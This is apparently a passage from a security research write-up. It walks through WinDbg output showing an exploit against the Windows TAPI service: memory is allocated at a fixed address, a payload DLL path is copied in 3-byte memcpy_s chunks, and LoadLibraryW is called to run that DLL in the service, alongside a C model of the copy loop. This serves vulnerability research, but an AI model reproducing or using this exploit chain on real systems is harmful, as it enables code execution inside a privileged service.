00007fff`aeae3bf8 cc              int     3
00007fff`aeae3bf9 cc              int     3
00007fff`aeae3bfa cc              int     3
00007fff`aeae3bfb cc              int     3
00007fff`aeae3bfc cc              int     3
00007fff`aeae3bfd cc              int     3
0:007> r r8d
r8d=3000
0:007> r r9d
r9d=40
0:007> r rcx
rcx=00000000ba000000
0:007> r rdx
rdx=0000000000000003

According to the debugging information, every parameter meets the requirements. After invoking the VirtualAlloc function, I have successfully allocated memory at a 32-bit address.

0:007> p
tapisrv!TUISPIDLLCallback+0x1d2:
00007fff`7c27fed2 85c0            test    eax,eax
0:007> dq ba000000
00000000`ba000000  00000000`00000000 00000000`00000000
00000000`ba000010  00000000`00000000 00000000`00000000
00000000`ba000020  00000000`00000000 00000000`00000000
00000000`ba000030  00000000`00000000 00000000`00000000
00000000`ba000040  00000000`00000000 00000000`00000000

This means I can now use the first parameter as a valid pointer. The next step is to copy the payload DLL path to the 32-bit address. However, I can't use the memcpy function, because the second parameter is a constant value that must be 3. Instead, I decided to use the memcpy_s function, where the second parameter is the destination size, the third parameter is the source address, and the fourth parameter is the number of bytes to copy. With the destination size fixed at 3, I can copy at most 3 bytes at a time, but I can invoke it multiple times to complete the path copying.

0:009> dc ba000000
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.
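
The repeated 3-byte copies can be modeled as follows. This is a portable sketch, not the exploit: bounded_copy is a hypothetical stand-in that only mirrors the size check of memcpy_s(dest, destSize, src, count), and copy_in_triples is an illustrative loop. In the real attack each iteration would be one RPC call with its own destination address and source offset.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define FIXED_DEST_SIZE 3   /* the second argument is pinned to 3 */

/* Stand-in for memcpy_s: refuses to copy when count exceeds destsz.
 * Hypothetical helper, not the CRT function. */
int bounded_copy(void *dest, size_t destsz, const void *src, size_t count) {
    if (dest == NULL || src == NULL || count > destsz)
        return 1;
    memcpy(dest, src, count);
    return 0;
}

/* Copies len bytes in chunks of at most 3 bytes.
 * Returns the number of calls made, or -1 if a call fails. */
int copy_in_triples(unsigned char *dest, const unsigned char *src, size_t len) {
    int calls = 0;
    assert(dest != NULL && src != NULL);
    for (size_t done = 0; done < len; done += FIXED_DEST_SIZE) {
        size_t left = len - done;
        size_t count = left < FIXED_DEST_SIZE ? left : FIXED_DEST_SIZE;
        if (bounded_copy(dest + done, FIXED_DEST_SIZE, src + done, count) != 0)
            return -1;
        calls++;
    }
    return calls;
}
```

The path in the dump above is 40 UTF-16 characters, or 80 bytes, so this loop needs 27 calls: 26 full 3-byte copies and one final 2-byte copy. The terminating null does not need to be copied in this model if the destination starts out zeroed, as the freshly allocated region does in the earlier dump.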

The last step is to invoke LoadLibrary to load the payload DLL.

0:009> u
KERNELBASE!LoadLibraryW:
00007fff`ad1f2480 4533c0          xor     r8d,r8d
00007fff`ad1f2483 33d2            xor     edx,edx
00007fff`ad1f2485 e9e642faff      jmp     KERNELBASE!LoadLibraryExW (00007fff`ad196770)
00007fff`ad1f248a cc              int     3
00007fff`ad1f248b cc              int     3
00007fff`ad1f248c cc              int     3
00007fff`ad1f248d cc              int     3
00007fff`ad1f248e cc              int     3
0:009> dc rcx
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.
00000000`ba000050  00000000 00000000 00000000 00000000  ................
00000000`ba000060  00000000 00000000 00000000 00000000  ................
00000000`ba000070  00000000 00000000 00000000 00000000  ................
0:009> k
 # Child-SP          RetAddr               Call Site
00 000000ab`ac97eac8 00007fff`7c27fed2     KERNELBASE!LoadLibraryW
01 000000ab`ac97ead0 00007fff`7c27817a     tapisrv!TUISPIDLLCallback+0x1d2
02 000000ab`ac97eb60 00007fff`afb57f13     tapisrv!ClientRequest+0xba